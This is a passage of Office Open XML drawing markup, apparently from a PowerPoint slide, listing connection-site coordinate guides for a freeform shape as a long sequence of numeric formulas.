              <a:gd name="connsiteY34" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY144" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY145" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY146" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY147" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY148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01575 w 1508539"/>
              <a:gd name="connsiteY4" fmla="*/ 6715115 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 111426 w 1508539"/>
              <a:gd name="connsiteY5" fmla="*/ 6680170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01575 w 1508539"/>
              <a:gd name="connsiteY4" fmla="*/ 6715115 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 111426 w 1508539"/>
              <a:gd name="connsiteY5" fmla="*/ 6680170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11426 w 1508539"/>
              <a:gd name="connsiteY5" fmla="*/ 6680170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4248 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 169039 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6553006 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 173735 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6514360 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 272933 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 6211940 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 345501 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2425819 h 6858000"/>
